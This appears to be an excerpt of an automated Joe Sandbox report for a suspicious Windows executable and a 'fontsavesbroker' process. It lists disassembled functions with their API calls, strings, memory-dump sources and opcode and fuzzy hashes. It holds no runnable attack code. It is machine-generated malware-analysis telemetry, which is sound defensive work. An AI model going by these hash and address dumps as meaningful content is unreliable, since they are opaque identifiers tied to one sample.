                • Instruction Fuzzy Hash: E501F571000B44EFC7219F66DC88FCABBEDFB48711F004529F16A42160CBB52A48DBA4
                APIs
                • _free.LIBCMT ref: 004FBF28
                  • Part of subcall function 004F84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?), ref: 004F84F4
                  • Part of subcall function 004F84DE: GetLastError.KERNEL32(?,?,004FBFA7,?,00000000,?,00000000,?,004FBFCE,?,00000007,?,?,004FC3CB,?,?), ref: 004F8506
                • _free.LIBCMT ref: 004FBF3A
                • _free.LIBCMT ref: 004FBF4C
                • _free.LIBCMT ref: 004FBF5E
                • _free.LIBCMT ref: 004FBF70
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free$ErrorFreeHeapLast
                • String ID:
                • API String ID: 776569668-0
                • Opcode ID: 0e2f52b312ab111c160776317d79d187c0aa1d36efa0d2a8952bf72737df1ac7
                • Instruction ID: 4f5a51ee4e713577342487d41ddf4541dc59c1667663f0184ebd5488d6beae1a
                • Opcode Fuzzy Hash: 0e2f52b312ab111c160776317d79d187c0aa1d36efa0d2a8952bf72737df1ac7
                • Instruction Fuzzy Hash: F7F0FF33504209B7C620EB65EE86C2B73D9FA157147744C0EF609DBA10DB28FC859AA8
                APIs
                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\j0GOUGjcJD.exe,00000104), ref: 004F76FD
                • _free.LIBCMT ref: 004F77C8
                • _free.LIBCMT ref: 004F77D2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: _free$FileModuleName
                • String ID: C:\Users\user\Desktop\j0GOUGjcJD.exe
                • API String ID: 2506810119-2358271240
                • Opcode ID: 1b9fc1fdd17385afb8fff81c76efce671f24afcfce3e224d75de4d786721b403
                • Instruction ID: 474f8af98484eb9043b94b399d6c616221a9a9dd1ae037d2fb91f60cd4e9ca5d
                • Opcode Fuzzy Hash: 1b9fc1fdd17385afb8fff81c76efce671f24afcfce3e224d75de4d786721b403
                • Instruction Fuzzy Hash: DC31B171A0421CAFDB21EF9ADC81DBEBBECEB94310B14406BE60497310D6785E41DB99
                APIs
                • __EH_prolog.LIBCMT ref: 004D7579
                  • Part of subcall function 004D3B3D: __EH_prolog.LIBCMT ref: 004D3B42
                • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 004D7640
                  • Part of subcall function 004D7BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 004D7C04
                  • Part of subcall function 004D7BF5: GetLastError.KERNEL32 ref: 004D7C4A
                  • Part of subcall function 004D7BF5: CloseHandle.KERNEL32(?), ref: 004D7C59
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                • String ID: SeRestorePrivilege$SeSecurityPrivilege
                • API String ID: 3813983858-639343689
                • Opcode ID: 88c7e258929ea77f8a9cf485d149d925203cc992cc005b2e4d16935dcc86c9ce
                • Instruction ID: 756e208a894e375bbe3e214f7186c6dc1b18c93460c6e57b61e3d2630dc909ca
                • Opcode Fuzzy Hash: 88c7e258929ea77f8a9cf485d149d925203cc992cc005b2e4d16935dcc86c9ce
                • Instruction Fuzzy Hash: 2F31D771908248AEDF10EB66DC55BEE7B68AF14358F00405FF444A7392E7B88A48C765
                APIs
                  • Part of subcall function 004D130B: GetDlgItem.USER32(00000000,00003021), ref: 004D134F
                  • Part of subcall function 004D130B: SetWindowTextW.USER32(00000000,005035B4), ref: 004D1365
                • EndDialog.USER32(?,00000001), ref: 004EA4B8
                • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 004EA4CD
                • SetDlgItemTextW.USER32(?,00000066,?), ref: 004EA4E2
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ItemText$DialogWindow
                • String ID: ASKNEXTVOL
                • API String ID: 445417207-3402441367
                • Opcode ID: 2e77367b154e94f01d57943e695d302d2a2594388e05ba41c8b41788367462fd
                • Instruction ID: ab86aed97b964c84bd8c8b8a5599929f6023d68fd25333fa638e574cc55383df
                • Opcode Fuzzy Hash: 2e77367b154e94f01d57943e695d302d2a2594388e05ba41c8b41788367462fd
                • Instruction Fuzzy Hash: 1311E432204380BFD6219F599D0CF267769EB56301F000017F2009A3E0C7A9AD29E72B
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                • Associated: 00000000.00000002.1679692228.00000000004D0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679741052.0000000000503000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.000000000050E000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000514000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679761781.0000000000531000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000000.00000002.1679806974.0000000000532000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: __fprintf_l_strncpy
                • String ID: $%s$@%s
                • API String ID: 1857242416-834177443
                • Opcode ID: c77809ba28eeeffcd7fb470f5937ff4e1cf63e5dcc6c701188a36d2f05c8b0d4
                • Instruction ID: 27ec641af717419cc8fec1f0ad7b4f860d5601af96e1cc82cccd7ed3646f78a9
                • Opcode Fuzzy Hash: c77809ba28eeeffcd7fb470f5937ff4e1cf63e5dcc6c701188a36d2f05c8b0d4
                • Instruction Fuzzy Hash: 1121813284024CAADF20DEA4CC56FEE7BACEF04300F140567FA1596291D379DA55DB55
                APIs
                • _swprintf.LIBCMT ref: 004DB51E
                  • Part of subcall function 004D400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D401D
                • _wcschr.LIBVCRUNTIME ref: 004DB53C
                • _wcschr.LIBVCRUNTIME ref: 004DB54C
                Strings
                Similarity
                • API ID: _wcschr$__vswprintf_c_l_swprintf
                • String ID: %c:\
                • API String ID: 525462905-3142399695
                • Opcode ID: e87fc5f876c58095e09be9c16d582dc75ced96ac6f8a301365775b9f905738e8
                • Instruction ID: 78bc87b59e180c2af95157441558a369f9ce1e91e3a9f6d872de048e25392acc
                • Opcode Fuzzy Hash: e87fc5f876c58095e09be9c16d582dc75ced96ac6f8a301365775b9f905738e8
                • Instruction Fuzzy Hash: E9014E63900311F6C7206B76ACA2C3BB7ACDE953A4741440BF945C6281FB38D450C2E9
                APIs
                • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,004DABC5,00000008,?,00000000,?,004DCB88,?,00000000), ref: 004E06F3
                • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,004DABC5,00000008,?,00000000,?,004DCB88,?,00000000), ref: 004E06FD
                • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,004DABC5,00000008,?,00000000,?,004DCB88,?,00000000), ref: 004E070D
                Strings
                • Thread pool initialization failed., xrefs: 004E0725
                Similarity
                • API ID: Create$CriticalEventInitializeSectionSemaphore
                • String ID: Thread pool initialization failed.
                • API String ID: 3340455307-2182114853
                • Opcode ID: ae750121dda91dcf3c421b256ebae84c51460d740a632ef21a42d3e534abc7a1
                • Instruction ID: 1d70f12258140487a8a2ceef3dfd4da74557cad132c8b586d7e32bed55b81be8
                • Opcode Fuzzy Hash: ae750121dda91dcf3c421b256ebae84c51460d740a632ef21a42d3e534abc7a1
                • Instruction Fuzzy Hash: 4511A3B1501709AFD3205F76C888AABFBECEB95745F10482FF1DA82200D6B56980CB54
                Strings
                Similarity
                • API ID:
                • String ID: RENAMEDLG$REPLACEFILEDLG
                • API String ID: 0-56093855
                • Opcode ID: b680c822b3886c3a9803a2150a788376fab890530935a4759803d67879b0048f
                • Instruction ID: 055cb7b23701fbda792a0298ab36a1ea416ffff57dc230e9ca77a66699bd0da7
                • Opcode Fuzzy Hash: b680c822b3886c3a9803a2150a788376fab890530935a4759803d67879b0048f
                • Instruction Fuzzy Hash: 8E01F9719002856FCB215F16ED44AA63FA9F728385F004422F801D2370CBB49C58FB65
                APIs
                Similarity
                • API ID: __alldvrm$_strrchr
                • String ID:
                • API String ID: 1036877536-0
                • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                • Instruction ID: 88b0b066211758727178d0ef3f3b5cec00eb32ecc584e9be92eb7c0418d0d887
                • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                • Instruction Fuzzy Hash: 28A1673190438A9FDB25CE19C8917BEBBE4EF65314F1445AFEA849B381C23C8C42C759
                APIs
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,004D80B7,?,?,?), ref: 004DA351
                • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,004D80B7,?,?), ref: 004DA395
                • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,004D80B7,?,?,?,?,?,?,?,?), ref: 004DA416
                • CloseHandle.KERNEL32(?,?,00000000,?,004D80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 004DA41D
                Similarity
                • API ID: File$Create$CloseHandleTime
                • String ID:
                • API String ID: 2287278272-0
                • Opcode ID: 0838771ec80eff99e26a6ff1f463a302b0bf7ab6e1b6483c71cec4cfe66dd9cf
                • Instruction ID: ccc2a210c1628ac12acba8d4bb34a9d88cc87e76f95016afcaa5d5860c22655b
                • Opcode Fuzzy Hash: 0838771ec80eff99e26a6ff1f463a302b0bf7ab6e1b6483c71cec4cfe66dd9cf
                • Instruction Fuzzy Hash: 9341F0302483809AD731DF65CC65BAFBBE9AB81304F04091FB9D0933C0C7A89A58DB57
                APIs
                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,004F89AD,?,00000000,?,00000001,?,?,00000001,004F89AD,?), ref: 004FC0E6
                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004FC16F
                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004F67E2,?), ref: 004FC181
                • __freea.LIBCMT ref: 004FC18A
                  • Part of subcall function 004F8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,004FC13D,00000000,?,004F67E2,?,00000008,?,004F89AD,?,?,?), ref: 004F854A
                Similarity
                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                • String ID:
                • API String ID: 2652629310-0
                • Opcode ID: 99274464cb2808cec39df6eecfe55e741b40e182ba82fda61fa275f3aac1e225
                • Instruction ID: 1c2176b07b2906d2c9d64c99b48605707fa49b34e183dc3a49b690909a39cb6d
                • Opcode Fuzzy Hash: 99274464cb2808cec39df6eecfe55e741b40e182ba82fda61fa275f3aac1e225
                • Instruction Fuzzy Hash: 3031F272A0010EABDB248F65DD81DBF7BA5EB44310F14012AFD04D7291E739CD65CBA4
                APIs
                • GetDC.USER32(00000000), ref: 004E9DBE
                • GetDeviceCaps.GDI32(00000000,00000058), ref: 004E9DCD
                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004E9DDB
                • ReleaseDC.USER32(00000000,00000000), ref: 004E9DE9
                Similarity
                • API ID: CapsDevice$Release
                • String ID:
                • API String ID: 1035833867-0
                • Opcode ID: e8abff34d42590ae76d401ee1b943e056a7eebfc9c3ea3f9284b45ee5c677065
                • Instruction ID: 61db78ccd39bb052e9f00afcc4e739df45bbe59092fd3a09c00c5d352530254b
                • Opcode Fuzzy Hash: e8abff34d42590ae76d401ee1b943e056a7eebfc9c3ea3f9284b45ee5c677065
                • Instruction Fuzzy Hash: 22E0EC31989A22A7D7241BA5BC0DBDB3B55AB29713F054005F605962D0DAB4444DEBA4
                APIs
                • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004F2016
                • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004F201B
                • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004F2020
                  • Part of subcall function 004F310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004F311F
                • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004F2035
                Similarity
                • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                • String ID:
                • API String ID: 1761009282-0
                • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                • Instruction ID: 93056af8f9849b3c1fd8ea9dd2b7f5660ac3efe2511328e76f2a6fda035df150
                • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                • Instruction Fuzzy Hash: 97C0022600565DA81C113EB363021BF07404862BCEB9220CBAB80172439E8E0A0AA03F
                APIs
                  • Part of subcall function 004E9DF1: GetDC.USER32(00000000), ref: 004E9DF5
                  • Part of subcall function 004E9DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 004E9E00
                  • Part of subcall function 004E9DF1: ReleaseDC.USER32(00000000,00000000), ref: 004E9E0B
                • GetObjectW.GDI32(?,00000018,?), ref: 004E9F8D
                  • Part of subcall function 004EA1E5: GetDC.USER32(00000000), ref: 004EA1EE
                  • Part of subcall function 004EA1E5: GetObjectW.GDI32(?,00000018,?), ref: 004EA21D
                  • Part of subcall function 004EA1E5: ReleaseDC.USER32(00000000,?), ref: 004EA2B5
                Strings
                Similarity
                • API ID: ObjectRelease$CapsDevice
                • String ID: (
                • API String ID: 1061551593-3887548279
                • Opcode ID: 6deee80773b63a15da845eb4724e4ac52fb3741e5c8668b97dd50ea43a09f022
                • Instruction ID: 1302301602d751ef20fd06e36e86e5397c6aee18b44f2d9370b164bb8d41121d
                • Opcode Fuzzy Hash: 6deee80773b63a15da845eb4724e4ac52fb3741e5c8668b97dd50ea43a09f022
                • Instruction Fuzzy Hash: 3A812375208345AFC714DF29C84492EBBE9FF98705F00492EF98AD7260DB35AD09DB52
                APIs
                Strings
                Similarity
                • API ID: _swprintf
                • String ID: %ls$%s: %s
                • API String ID: 589789837-2259941744
                • Opcode ID: 6e03efb66b1523dff74e6f9851d096c92114c44587767568e648780f621b3df9
                • Instruction ID: 6de9274ac12c7a9494c1b8569b1dcdf4f192fedf3def75f188f22769c44988f1
                • Opcode Fuzzy Hash: 6e03efb66b1523dff74e6f9851d096c92114c44587767568e648780f621b3df9
                • Instruction Fuzzy Hash: 4351B53168C7C0F9EA211A9A8C52F367665AB04B07F244917F3EB748E1C6FD54E1660F
                APIs
                • __EH_prolog.LIBCMT ref: 004D7730
                • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 004D78CC
                  • Part of subcall function 004DA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,004DA27A,?,?,?,004DA113,?,00000001,00000000,?,?), ref: 004DA458
                  • Part of subcall function 004DA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,004DA27A,?,?,?,004DA113,?,00000001,00000000,?,?), ref: 004DA489
                Strings
                Similarity
                • API ID: File$Attributes$H_prologTime
                • String ID: :
                • API String ID: 1861295151-336475711
                • Opcode ID: 03e869ec4505b51a47f80b345db0f1ee0b9f0b4855ec1b0a32e1ee6cd66a1df0
                • Instruction ID: 73dca67bb9a065555e216d6763cc3830c7fc137855b78d229206d67ee07c52af
                • Opcode Fuzzy Hash: 03e869ec4505b51a47f80b345db0f1ee0b9f0b4855ec1b0a32e1ee6cd66a1df0
                • Instruction Fuzzy Hash: 46416671805158AADB20EB51DD65EEEB37CAF45304F0040DFB505A2292EB785F84DF69
                Strings
                Similarity
                • API ID:
                • String ID: UNC$\\?\
                • API String ID: 0-253988292
                • Opcode ID: 548f763f98f634609537fecbee3ab2a5bfd09a43d66772d03054232cffa30c83
                • Instruction ID: a47d868e96084c19a6643f6ecdada64c9dcd41e4fdb4aeac8c315ca5af8f7c95
                • Opcode Fuzzy Hash: 548f763f98f634609537fecbee3ab2a5bfd09a43d66772d03054232cffa30c83
                • Instruction Fuzzy Hash: 7E419235500259EBCB20AF22CC61EEF77ADEF44754B11406BF85593352D778DA44C6E8
                APIs
                • __CxxThrowException@8.LIBVCRUNTIME ref: 004E43D8
                Strings
                Similarity
                • API ID: Exception@8Throw
                • String ID: HCP$XCP
                • API String ID: 2005118841-2794936634
                • Opcode ID: 2563001fe78b62101447682ede9ff5f3414394e7169e68c2f44518f24c9beaf7
                • Instruction ID: b953dde3c532a3c668f01b753a52461a757a38469d7abf30211902c4cd8cb815
                • Opcode Fuzzy Hash: 2563001fe78b62101447682ede9ff5f3414394e7169e68c2f44518f24c9beaf7
                • Instruction Fuzzy Hash: 14416B706007408FD314DF2AC891BAAB7E5FF98304F05492EE99AC7351EB7AE818CB55
                APIs
                Strings
                Similarity
                • API ID:
                • String ID: Shell.Explorer$about:blank
                • API String ID: 0-874089819
                • Opcode ID: ad721b980c88cf2076350d6dc92cf78a561f62a9c64d18c069afa6207b546a7a
                • Instruction ID: aecc98e902253c8a830e62bdaceea376c847d174b3f28c9cf51d4d3dbc1a4613
                • Opcode Fuzzy Hash: ad721b980c88cf2076350d6dc92cf78a561f62a9c64d18c069afa6207b546a7a
                • Instruction Fuzzy Hash: 4D2185716143849FCB149F66C895A2B77A8FF84712B14856EF9098B2C2DB74EC01CB64
                APIs
                • DialogBoxParamW.USER32(GETPASSWORD1,00010418,004EA990,?,?), ref: 004ED4C5
                Strings
                Similarity
                • API ID: DialogParam
                • String ID: GETPASSWORD1$xjR
                • API String ID: 665744214-3697140082
                • Opcode ID: 3fe5f145b82d3da4d30ec52ad6b651cb75ef7edc96cafe91e1c73eb9eaa4ec59
                • Instruction ID: 8d0db1c01a460b78b2d19a1e05e52d050e6d2c160b1404207266242e2e8380b3
                • Opcode Fuzzy Hash: 3fe5f145b82d3da4d30ec52ad6b651cb75ef7edc96cafe91e1c73eb9eaa4ec59
                • Instruction Fuzzy Hash: FC117B71604284ABEB21DF369C05BEB3BD8B719356F048066BD45A72C1CBF8AC489768
                APIs
                  • Part of subcall function 004DEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 004DEB92
                  • Part of subcall function 004DEB73: GetProcAddress.KERNEL32(005181C0,CryptUnprotectMemory), ref: 004DEBA2
                • GetCurrentProcessId.KERNEL32(?,?,?,004DEBEC), ref: 004DEC84
                Strings
                • CryptUnprotectMemory failed, xrefs: 004DEC7C
                • CryptProtectMemory failed, xrefs: 004DEC3B
                Similarity
                • API ID: AddressProc$CurrentProcess
                • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                • API String ID: 2190909847-396321323
                • Opcode ID: f1af7b6fb584813472108adb092c421421a51eed17a3429056941d5c44474bc9
                • Instruction ID: 91c28e5bdb0b7156ddd554092840554199e5ae6a7f87bae8a75d5c0a2849731c
                • Opcode Fuzzy Hash: f1af7b6fb584813472108adb092c421421a51eed17a3429056941d5c44474bc9
                • Instruction Fuzzy Hash: 0D115C32A102146BDB257F36DC166AF3B58AF05B24B04801BFC055F381CB796D4197D8
                APIs
                Strings
                Similarity
                • API ID: _free
                • String ID: XP
                • API String ID: 269201875-3026131541
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 004EF25E
                • ___raise_securityfailure.LIBCMT ref: 004EF345
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FeaturePresentProcessor___raise_securityfailure
                • String ID: 8S
                • API String ID: 3761405300-2465534777
                APIs
                • CreateThread.KERNEL32(00000000,00010000,004E09D0,?,00000000,00000000), ref: 004E08AD
                • SetThreadPriority.KERNEL32(?,00000000), ref: 004E08F4
                  • Part of subcall function 004D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D6EAF
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: Thread$CreatePriority__vswprintf_c_l
                • String ID: CreateThread failed
                • API String ID: 2655393344-3849766595
                APIs
                  • Part of subcall function 004F8FA5: GetLastError.KERNEL32(?,00510EE8,004F3E14,00510EE8,?,?,004F3713,00000050,?,00510EE8,00000200), ref: 004F8FA9
                  • Part of subcall function 004F8FA5: _free.LIBCMT ref: 004F8FDC
                  • Part of subcall function 004F8FA5: SetLastError.KERNEL32(00000000,?,00510EE8,00000200), ref: 004F901D
                  • Part of subcall function 004F8FA5: _abort.LIBCMT ref: 004F9023
                • _abort.LIBCMT ref: 004FB2E0
                • _free.LIBCMT ref: 004FB314
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorLast_abort_free
                • String ID: P
                • API String ID: 289325740-2113778011
                APIs
                  • Part of subcall function 004DDA98: _swprintf.LIBCMT ref: 004DDABE
                  • Part of subcall function 004DDA98: _strlen.LIBCMT ref: 004DDADF
                  • Part of subcall function 004DDA98: SetDlgItemTextW.USER32(?,0050E154,?), ref: 004DDB3F
                  • Part of subcall function 004DDA98: GetWindowRect.USER32(?,?), ref: 004DDB79
                  • Part of subcall function 004DDA98: GetClientRect.USER32(?,?), ref: 004DDB85
                • GetDlgItem.USER32(00000000,00003021), ref: 004D134F
                • SetWindowTextW.USER32(00000000,005035B4), ref: 004D1365
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ItemRectTextWindow$Client_strlen_swprintf
                • String ID: 0
                • API String ID: 2622349952-4108050209
                APIs
                • WaitForSingleObject.KERNEL32(?,000000FF,004E0A78,?), ref: 004E0854
                • GetLastError.KERNEL32(?), ref: 004E0860
                  • Part of subcall function 004D6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004D6EAF
                Strings
                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 004E0869
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                • String ID: WaitForMultipleObjects error %d, GetLastError %d
                • API String ID: 1091760877-2248577382
                APIs
                • GetModuleHandleW.KERNEL32(00000000,?,004DD32F,?), ref: 004DDA53
                • FindResourceW.KERNEL32(00000000,RTL,00000005,?,004DD32F,?), ref: 004DDA61
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1679714188.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4d0000_j0GOUGjcJD.jbxd
                Similarity
                • API ID: FindHandleModuleResource
                • String ID: RTL
                • API String ID: 3537982541-834975271
                Strings
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID: ;$Z$}
                • API String ID: 0-2180252066
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 594152b9a5bb16e397f98e4ee65093dd228cc8da5bdddb2c2d2631e0bcea091b
                • Instruction ID: c2a260b4a93e149a9726eb470f7690cd3db3898ec809d9b1070f03a0ef1cc8f3
                • Opcode Fuzzy Hash: 594152b9a5bb16e397f98e4ee65093dd228cc8da5bdddb2c2d2631e0bcea091b
                • Instruction Fuzzy Hash: 0E211F31B0AA0D8BEB64EB94C8A4EED73B5EF54301F118275D40DE72A5DE34AA45CB40
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1ce3638e01f024ad90c516091e1dff66a147c027a6ae2b4e2b4bc615605be3d7
                • Instruction ID: 009dfeeeec5c04f58259b0c4627ec85bfcafe86fc726cc8f09b8dbae2a8eabc6
                • Opcode Fuzzy Hash: 1ce3638e01f024ad90c516091e1dff66a147c027a6ae2b4e2b4bc615605be3d7
                • Instruction Fuzzy Hash: D211A335E1AA0E4FE790EBA8C8995BD77E0FF54701F4146BAC41CC71B6DE38A5418701
                Memory Dump Source
                • Source File: 00000004.00000002.1804783856.00007FFD9B780000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B780000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_4_2_7ffd9b780000_fontsavesbroker.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 31bb91a89b2a4aa37d96d329557f0190d4bb9e63eb18d13b92c0d335f1e98594
                • Instruction ID: bd08b59c33dd620cf7e02099587e94f1b3586a5e44a711c3283a768bbbe1a522
